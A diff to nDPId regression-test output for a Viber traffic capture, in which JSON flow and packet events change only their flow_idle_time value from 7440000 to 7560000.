-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1527155646850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646850,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8QKlAAEAGdTLAqAARrNkXTqq2Abu2kyjUAAAAAKAC\/\/\/OpwAAAgQFtAQCCAoAIWh9AAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1527155646851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646851,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8SUEAADoGspqs2RdOwKgAEQG7qrbgrF\/UtpMo1aASpagYYgAAAgQFZAQCCAqjjizLACFofQEDAwg="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1527155646855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155646855,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0QKpAAEAGdTnAqAARrNkXTqq2Abu2kyjV4Kxf1YAQAq3p2QAAAQEICgAhaH6jjizL"} -00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646850,"flow_last_seen":1527155646850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155646850,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1527155646850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646850,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8QKlAAEAGdTLAqAARrNkXTqq2Abu2kyjUAAAAAKAC\/\/\/OpwAAAgQFtAQCCAoAIWh9AAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1527155646851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155646851,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8SUEAADoGspqs2RdOwKgAEQG7qrbgrF\/UtpMo1aASpagYYgAAAgQFZAQCCAqjjizLACFofQEDAwg="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1527155646855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155646855,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0QKpAAEAGdTnAqAARrNkXTqq2Abu2kyjV4Kxf1YAQAq3p2QAAAQEICgAhaH6jjizL"} +00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1527155646968,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155646968,"pkt":"AQBeAAD7MAdNo1+nCABFAABZHwxAAP8RutLAqAAR4AAA+xTpFOkARSvHAAQAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} 00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": 
{"answer":"_805741c9._sub._googlecast._tcp.local"}} 
@@ -83,16 +83,16 @@ 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1527155648506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":183,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":183,"pkt_l4_len":149,"thread_ts_msec":1527155648506,"pkt":"MAdNo1+nAA6OMNv9CABFAACpXKlAAEARXCrAqAAPwKgAEQA1rVgAlY7c00mBgAABAAUAAAAAB3ZlbmV0aWEDaWFkBmFwcGJveQNjb20AAAEAAcAMAAUAAQAAAQIAGQF5A3NzbAZnbG9iYWwGZmFzdGx5A25ldADANAABAAEAAAAdAASXZQGCwDQAAQABAAAAHQAEl2VBgsA0AAEAAQAAAB0ABJdlgYLANAABAAEAAAAdAASXZcGC"} 00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155648506,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.1.130"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648513,"flow_last_seen":1527155648513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155648513,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1527155648513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648513,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8cjBAAEAGbuvAqAARl2UBgtnCAbvgBRgtAAAAAKAC\/\/+wcAAAAgQFtAQCCAoAIWodAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1527155648523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648523,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAADoG5xuXZQGCwKgAEQG72cJzm\/EW4AUYLqAScSBKVAAAAgQFtAQCCArIDMgpACFqHQEDAwk="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1527155648526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155648526,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0cjFAAEAGbvLAqAARl2UBgtnCAbvgBRguc5vxF4AQAq3nkgAAAQEICgAhaiDIDMgp"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648513,"flow_last_seen":1527155648513,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155648513,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1527155648513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648513,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8cjBAAEAGbuvAqAARl2UBgtnCAbvgBRgtAAAAAKAC\/\/+wcAAAAgQFtAQCCAoAIWodAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1527155648523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648523,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAADoG5xuXZQGCwKgAEQG72cJzm\/EW4AUYLqAScSBKVAAAAgQFtAQCCArIDMgpACFqHQEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1527155648526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155648526,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0cjFAAEAGbvLAqAARl2UBgtnCAbvgBRguc5vxF4AQAq3nkgAAAQEICgAhaiDIDMgp"} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1527155666982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155666982,"pkt":"AQBeAAD7MAdNo1+nCABFAABZIsxAAP8RtxLAqAAR4AAA+xTpFOkARSvGAAUAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670632,"flow_last_seen":1527155670632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155670632,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1527155670632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670632,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8WoBAAEAGCJrAqAAREskEILFwAbuQXSU3AAAAAKAC\/\/+HxQAAAgQFtAQCCAoAIX+3AAAAAAEDAwc="} 
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670632,"flow_last_seen":1527155670632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155670632,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1527155670632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670632,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8WoBAAEAGCJrAqAAREskEILFwAbuQXSU3AAAAAKAC\/\/+HxQAAAgQFtAQCCAoAIX+3AAAAAAEDAwc="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdfMxAAEAR5NnAqAAREskEILhDHzEBCRHz7fYBAAUArBk1jI9k5EcHridUEQCowEO4MgAAAEMBABABAK45kpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAvcYFlBohustZk1e\/8OyZiSqP86k39WGwDkG7f\/rMnT2tcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6f1EwNZ4BrIBNZIXKB4sgy96MQL790EZYw7fY9vCydMCFozrGypXQPtcVrV5xCrsYqA8zuDlnCD1lV04sfnGYMAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="} 
00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
@@ -100,19 +100,19 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAA+fM1AAEAR5bfAqAAREskEILhDHzMAKi7T7fYZAKwZNYyPZORHJd9NTuHNNxtcmrwm2dMLSwG7ObMAAA=="} 00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwfM5AAEAR5cTAqAAREskEILhDHzEAHFuJ7fYJALM5kpFjAQAArBk1jI9k5Ec="} 
